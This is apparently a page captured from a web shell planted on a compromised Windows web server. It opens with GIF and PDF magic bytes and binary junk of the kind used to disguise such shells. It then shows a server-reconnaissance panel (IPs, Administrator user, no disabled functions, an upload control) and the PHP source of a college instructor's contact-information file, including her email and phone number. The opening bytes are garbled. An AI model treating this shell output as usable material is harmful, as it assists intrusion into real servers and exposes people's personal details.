GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/AmyJoMaher/ |
Upload File : |
<? // AmyJoMaher/ContactInformation.phpinc // Display the Instructor contact information. if ( $_SERVER['REMOTE_ADDR'] == 'x173.16.60.216' ) d_On(); // You can set any key/value and it will display in your contact information list. Only 'Instructor', 'Email address' and 'Weekly schedule' are preset for use. // They will be displayed in the order you create them with the exception of 'Weekly schedule'. // The format for creating $InstructorInformation key/values is: $InstructorInformation['Contact display text'] = 'Contact information'; // 'Instructor' is used for the alt attribute of your 'Weekly schedule' image. // 'Email address' is used to generate an email link. // 'Weekly schedule' is displayed with a header line and is at the bottom of the contact information $InstructorInformation = array(); $InstructorInformation['Instructor'] = 'Amy Jo Maher'; $InstructorInformation['Image'] = '<img src="/images/AmyJoMaher100.jpg" width="100" height="144" alt="Jim Martinson" />'; $InstructorInformation['Email address'] = 'Amy.Maher@ridgewater.edu'; $InstructorInformation['Work number'] = '320-234-8576 <span class="note">This number does not accept text messages.</span>'; $InstructorInformation['WeeklyCampus'] = array(); // 20153 Fall 2014 schedule. #$InstructorInformation['WeeklyCampus'][1] = "Hutchinson, Hutchinson, Hutchinson, Hutchinson, Hutchinson"; #$InstructorInformation['WeeklyCampus'][0] = "Hutchinson, Hutchinson, Hutchinson, Hutchinson, Hutchinson"; $InstructorCalendar = array(); // 20153 2014 Fall Semester. include('common/ContactInformation.phpinc'); ?>